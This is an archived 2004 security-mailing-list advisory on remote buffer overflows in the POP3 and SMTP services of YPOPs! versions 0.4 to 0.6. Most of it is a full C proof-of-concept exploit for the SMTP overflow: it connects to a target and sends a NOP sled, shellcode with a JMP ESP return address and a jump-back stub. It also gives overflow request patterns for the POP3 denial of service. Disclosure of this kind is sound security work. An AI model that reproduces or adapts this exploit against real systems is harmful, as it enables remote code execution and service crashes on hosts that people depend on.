[NT] Remote Buffer overflow Vulnerability in YPOPs!

From: SecuriTeam (support_at_securiteam.com)
Date: 10/04/04

Next message: SecuriTeam: "[NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities"

Previous message: SecuriTeam: "[REVS] Microsoft PCT Exploit Analysis"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 Oct 2004 13:50:56 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Remote Buffer overflow Vulnerability in YPOPs!
------------------------------------------------------------------------

SUMMARY

" <http://yahoopops.sourceforge.net/> YPOPs! is an application that
provides POP3 access to Yahoo! Mail. It is available on the Windows,
Linux, Solaris and Mac platforms."
Both POP3 and SMTP services have buffer overflow vulnerabilities. The
Remote Attacker can send specific Request to these services to cause a
Stack based buffer overflow which could allow a remote attacker to execute
arbitrary code or just simply crash the service on a vulnerable system.

DETAILS

Vulnerable Systems:
* YahooPOPS version 0.4 up to v0.6

A YahooPOPS 0.x uses the Local SMTP and POP3 engines to send and receive
emails. SMTP service is not Enabled By default. Users can enable SMTP by
Software Options.

A POP3 USER request with more than 180 bytes will corrupt the heap. POP3
request (Dos Attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready
[USER][180xA][BBBB]

As a result the EAX and ECX will be overwritten.

SMTP request:
Sending a request with more than 504 bytes will overwrite the ESP and
cause a stack based overflow.

Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
[504xA] [BBBB]

As a result the EIP registers will be overwritten.

Proof of Concept Code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

/*- harmless code (tnx to snooq) , will open notepad on the remote
machine */
char code[]= "\x33\xc0" // xor eax, eax slight modification to move esp
up
"\xb0\xf0" // mov al, 0f0h
"\x2b\xe0" // sub esp,eax
"\x83\xE4\xF0" // and esp, 0FFFFFFF0h
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8\xfd\x98\xe7\x77" // mov eax,YYYY
->ExitProcess()win2k(SP4)0x7c4ee01a
"\xff\xd0"; // call eax

WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen,i;
   char *hostname;
   unsigned short port;

  if (argc <= 1)
   {
          printf("YPOPs! SMTP Overflow\n");
          printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");

      exit(0);
   }

printf("YPOPs! SMTP Overflow\n");
printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("25");

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }

   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
          printf("%s",hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);

   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "220");
   if (check == NULL)
   {
      printf("ERROR: NO response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

plen=504-sizeof(code);
   memset(overflow,0,sizeof(overflow));

   for (i=0; i<plen;i++){strcat(overflow,"\x90");}

   strcat(overflow,code);
   strcat(overflow,ret_code);
   strcat(overflow,jump_back);
   strcat(overflow,"\n");

   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Exploit Sent.\n");

   closesocket(sockfd);
   WSACleanup();
   return 0;
}
Vendor Status:
Vendor was informed on 24 September 2004 by Hat-Squad Security Team

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugtraq@hat-squad.com>
Hat-Squad Security Team.
The original article can be found at:
<http://www.hat-squad.com/en/000075.html>
http://www.hat-squad.com/en/000075.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities"

Previous message: SecuriTeam: "[REVS] Microsoft PCT Exploit Analysis"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NT] Netcat for Windows -e Buffer Overflow
... Get your security news from a reliable source. ... push 20646D63h; Push cmd on stack, ... or eax, eax ... mov cl,byte ptr ...
(Securiteam)
[NT] Trillian Pro Rendezvous XMPP HTML Decoding Heap Corruption
... Get your security news from a reliable source. ... The specific flaw exists in the Rendezvous / XMPP (Extensible Messaging ... 4900C47E push eax ...
(Securiteam)
Re: Wlan @ bestbuy is cleartext?
... >> direct efforts at blame and how to make such toys as ... If folks had not harrassed M$ over the years about how poory they dealt ... with security, do you think we'd now see them now at making security a ... trying to push more tasks upon over worked jack-of-all-trades admins. ...
(Vuln-Dev)
Re: Where is terminal services client in PPC 2003?
... to access alternative ports. ... I guess you can always tunnel through a VPN if your worried about security over the public ... Al Jarvi (MS-MVP Windows Networking) ... but push up the encryption level? ...
(microsoft.public.pocketpc)
Re: uh? security problem?
... Then you will have "Sharing And Security" in the ... context menu for files, folders, etc. in Windows Explorer. ... > granting access rights to the resource to the ASP.NET request identity. ... > eventArgument) +5 ...
(microsoft.public.dotnet.framework.aspnet)